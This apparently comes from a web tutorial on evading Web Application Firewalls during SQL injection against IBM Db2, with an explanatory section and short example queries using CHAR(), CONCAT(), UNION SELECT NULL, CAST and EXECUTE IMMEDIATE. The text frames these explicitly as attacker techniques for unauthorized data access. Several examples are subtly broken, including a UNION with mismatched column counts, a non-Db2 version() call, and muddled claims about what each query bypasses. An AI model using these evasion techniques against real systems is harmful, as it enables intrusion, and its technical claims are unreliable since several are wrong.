Alternate Syntax

Context

In this article, we explore how to employ alternate SQL syntax techniques to bypass Web Application Firewalls (WAFs) specifically for IBM Db2. The focus will be on employing various syntax structures that achieve the same end-result while eluding pattern-based recognition by security mechanisms. It assumes you have a fundamental grasp of SQL query structure, database functions, WAF mechanisms, and IBM Db2 WAF bypass techniques.

Theory

Alternate Syntax Techniques in SQL Injection

Alternate syntax in SQL injection involves using diverse SQL constructs to achieve identical query results. This approach is crucial for bypassing Web Application Firewalls, which may rely on detecting specific patterns or keywords. By employing alternate syntaxes, attackers can exploit WAF blind spots, enabling SQL injection that might otherwise be filtered out.

CHAR() Function Usage

The CHAR() function is employed to convert numeric values into characters. This obfuscation technique can help circumvent string-based filters implemented by WAFs. For instance, rather than inputting a character-based string that a WAF might detect, attackers can encode the same string using the CHAR() function.

CONCAT() Function Usage

CONCAT() is a function that amalgamates multiple strings into a single string. This is particularly useful for dynamically constructing payloads that evade signature or pattern-based detection by WAFs. By constructing parts of a SQL query separately and combining them, attackers can bypass WAF filters that target specific word sequences.

UNION SELECT NULL,NULL

UNION SELECT NULL,NULL is a common technique used to test SQL injection vulnerabilities while preserving the ability to match the original query's column count. This provides a stealthy method to determine if injection points are exploitable by verifying compatibility with existing queries.

Version Obfuscation Techniques

Obfuscating database version information helps in eluding WAFs programmed to filter based on version-specific syntax. By disguising version details, one can execute potentially dangerous queries under the guise of benign interactions.

INLINE CAST Usage

Using INLINE CAST involves converting data types directly within a SQL query. This is instrumental in bypassing WAF rules that expect data of specific types. By altering the data type, attackers can evade type-based detection mechanisms.

EXECUTE IMMEDIATE Function

The EXECUTE IMMEDIATE function executes dynamically constructed SQL statements. This is a pivotal technique for executing obfuscated queries that static analysis WAFs may not detect as malicious due to their transient nature.

Practice

Bypassing WAF with CHAR() Function

To bypass a WAF that filters specific strings, use the CHAR() function to encode the string:

SELECT * FROM users WHERE username = CHAR(97,100,109,105,110);

This converts "admin" to CHAR() format, effectively bypassing WAF string filters and granting unauthorized data access.

Using CONCAT() for WAF Evasion

Evasion of pattern-based WAF detection can be achieved by splitting and concatenating strings:

SELECT * FROM users WHERE username = CONCAT('ad','min');

This divides "admin" into segments that are joined, allowing for successful authentication without triggering pattern detectors.

UNION SELECT NULL,NULL for WAF Bypass

Detect SQL injection vulnerabilities with minimal detection risk by matching column counts with NULL placeholders:

SELECT name FROM users UNION SELECT NULL,NULL;

This enables the identification of vulnerabilities by bypassing WAF column checks without visible disruption.

Obfuscating Version with INLINE CAST

To avoid version-specific filtering, transform the version output using casting:

SELECT CAST(version() AS CHAR);

This tactic allows bypassing WAFs that scrutinize version outputs for infraction indicators.

Executing Obfuscated Queries with EXECUTE IMMEDIATE

Run obfuscated queries dynamically to circumvent static analysis:

EXECUTE IMMEDIATE 'SELECT * FROM users WHERE username = ''admin''';

By dynamically executing queries, attackers can access user data stealthily by bypassing static WAF analysis mechanisms.

Tools

  • Db2 SQL Editor
  • SQLMap

We use cookies

We use cookies to ensure you get the best experience on our website. For more information on how we use cookies, please see our cookie policy.